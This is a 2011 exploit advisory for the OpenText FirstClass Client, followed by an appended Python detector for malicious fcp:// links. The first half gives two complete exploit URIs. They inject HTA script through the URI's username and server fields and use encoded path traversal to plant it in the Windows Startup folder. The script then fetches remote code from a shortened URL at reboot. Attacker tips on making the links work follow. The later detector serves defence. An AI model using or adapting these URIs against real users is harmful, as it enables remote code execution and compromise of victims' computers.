
# Title : OpenText FirstClass Client v 11.005 Code Execution
# Published : 2011-04-12
# Author : Kyle Ossinger

# Exploit Title: OpenText FirstClass Client (Delayed) Code Execution
# Date: Discovered 11/16/2010, Contacted OpenText 2/1/11 and 2/7/11, Released 4/11/2011
# Author: Kyle Ossinger (www.k0ss.net)
# Email: security@k0ss.net
# Software Link: http://www3.firstclass.com/ClientDownloads/FC11ClientDownloadFiles/FC11005US.exe
# Version: v.11 and lower, but will probably work on newer versions once they are released
# Tested on: Windows XP, Vista, 7
# CVE : none, no response from MITRE about this

DISCLAIMER
--------------------
I contacted OpenText about this issue twice over the period of a few weeks and they never responded. This is why I'm releasing the exploit now; so it has a better chance of being patched.

I take no responsibility for how anyone uses the following information. I only hope this helps the exploit developers think outside the box of overflow exploits in executable programs. Any testing of the following information should be done in an isolated network using a FirstClass server that you own and operate or have permission to try this out on.

ABOUT
-----------
This is an implementation flaw, not your usual buffer overflow/heap overflow/format string exploit.

By getting a victim to click on a specially crafted link in the FirstClass mail client, an attacker can place an executable file on the victim's computer which will be executed upon the next system reboot.

The way it works is that you can make a URI to create a settings file for the user to use, by crafting it as such:

fcp://username:password(optional)@servername.tld;settingsfilename.fc

Whatever you put into username and servername gets put into the settings file as plain text, so that is how I inject some code. You normally can't change the file extension though (seen at the end of the URI), but after a lot of tinkering I found that if you make the URI try to access a path inside of the FirstClass server, you (for some reason) CAN change the file extension. Since I had to inject some commands into this file to make it execute code, but it is surrounded by junk characters that would break any compiled executable or even batch scripts, I knew I'd have to use an HTML Application (HTA) file, which does indeed work wonderfully.

THE EXPLOIT URI
---------------------------
The following URI will add the executable file to the startup programs directory of every user on the computer, given that the current user has write access to the All Users directory on Windows. An attacker would only use this if he or she were certain that the victim user is an Administrator on his or her computer.

fcp://<hta><script src='is.gd/9JR6g0' id="s"></script>@<body onload=(s.src="http"%2bString.fromCharCode(58)%2bString.fromCharCode(47)%2BString.fromCharCode(47)%2Bs.src)>/j;%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cAll%20Users%5cStart%20Menu%5cPrograms%5cStartup%5ca%2ehta

The following URI will add that same executable file to the CURRENT USER's startup programs directory, but maybe afterwards the attacker could launch some privilege escalation exploits to get the desired access.

fcp://<hta><script src='is.gd/9JR6g0' id="s"></script>@<body onload=(s.src="http"%2bString.fromCharCode(58)%2bString.fromCharCode(47)%2BString.fromCharCode(47)%2Bs.src)>/j;%2e%2e%5c%2e%2e%5c%2e%2e%5cStart%20Menu%5cPrograms%5cStartup%5ca%2ehta

If you want to understand more of how this exploit works please check out www.k0ss.net, but if you just want to know the basic idea of how it works these basics will have to suffice.

The <script src=> needs to point to your javascript file which uses only javascript that WSH can understand. Also, the URL pointing to your script file must be made into a small URL in order to fit size constraints. Make sure to strip off the "http://" part from the script URL as well, as it would break the exploit.

NOTE: The URI can be a bit finicky when trying to put it into a bookmark/link on FirstClass. It usually adds 2 random CRLF characters, and gets rid of the 'a' in "hta". You can correct this and hit Ok again, and it will look normal again and work. It's just something to check if it isn't working on your test machine.

A complete write-up on how this particular exploit works can be viewed at www.k0ss.net
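The advisory boils down to three traits a malicious fcp:// link carries: percent-encoded path traversal in the settings-file component, a settings file whose extension is not .fc, and HTML/script markup smuggled into the username or server parts of the URI. The following is an added example, not part of the advisory and not OpenText's code, showing how a mail gateway or link scanner could check an fcp:// link for those traits before it reaches a FirstClass client. The URI layout it parses (userinfo@host/path;settingsfile) is taken from the advisory; the sample links it scans are constructed here, with a placeholder in place of any real script host.

```python
# Added example (not from the advisory): defender-side triage of fcp:// links.
# Flags the traits the advisory describes in a crafted FirstClass URI:
#   - "..\" or "../" traversal in the settings-file name (usually %-encoded)
#   - a settings file that does not end in .fc (e.g. an .hta in a Startup folder)
#   - HTML/script markup in the userinfo or host part of the URI
import re
from urllib.parse import unquote

SETTINGS_EXT = ".fc"
TRAVERSAL_RE = re.compile(r"\.\.[\\/]")
MARKUP_RE = re.compile(r"<\s*[a-zA-Z/!]")

# Constructed samples (not the advisory's URIs). The script host is a placeholder.
BENIGN_SAMPLE = "fcp://alice:secret@mail.example.com;mail.fc"
MALICIOUS_SAMPLE = (
    "fcp://<hta><script src='SCRIPT-HOST-PLACEHOLDER' id=\"s\"></script>"
    "@<body onload=(s.src=s.src)>/j;"
    "%2e%2e%5c%2e%2e%5c%2e%2e%5cStart%20Menu%5cPrograms%5cStartup%5ca%2ehta"
)


def _fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded traversal is not missed."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyze_fcp_uri(uri: str) -> dict:
    """Return findings for one fcp:// URI.

    Layout assumed (from the advisory): fcp://userinfo@host/path;settingsfile
    """
    findings = {
        "scheme_ok": uri.lower().startswith("fcp://"),
        "traversal": False,
        "bad_extension": False,
        "markup_in_authority": False,
        "decoded_settings_path": "",
        "suspicious": False,
    }
    if not findings["scheme_ok"]:
        return findings

    rest = uri[len("fcp://"):]
    # The settings-file name is the component after the last ';'.
    head, sep, settings = rest.rpartition(";")
    if not sep:
        head, settings = rest, ""

    # Split the authority at the last '@' (as URL parsers do), then drop any path.
    userinfo, sep, hostpath = head.rpartition("@")
    if not sep:
        userinfo, hostpath = "", head
    host = hostpath.split("/", 1)[0]

    decoded_settings = _fully_decode(settings)
    findings["decoded_settings_path"] = decoded_settings
    findings["traversal"] = bool(TRAVERSAL_RE.search(decoded_settings))
    findings["bad_extension"] = bool(settings) and not decoded_settings.lower().endswith(SETTINGS_EXT)
    findings["markup_in_authority"] = bool(
        MARKUP_RE.search(_fully_decode(userinfo)) or MARKUP_RE.search(_fully_decode(host))
    )
    findings["suspicious"] = (
        findings["traversal"] or findings["bad_extension"] or findings["markup_in_authority"]
    )
    return findings


if __name__ == "__main__":
    for sample in (BENIGN_SAMPLE, MALICIOUS_SAMPLE):
        result = analyze_fcp_uri(sample)
        verdict = "BLOCK" if result["suspicious"] else "allow"
        print(f"{verdict}: {sample[:60]}... -> {result}")
```

The check decodes before matching so that `%2e%2e%5c` is seen as `..\`, and it treats any settings file that is not a bare `.fc` name as suspect rather than enumerating dangerous extensions, since the advisory's point is that the extension was never supposed to be attacker-controlled at all.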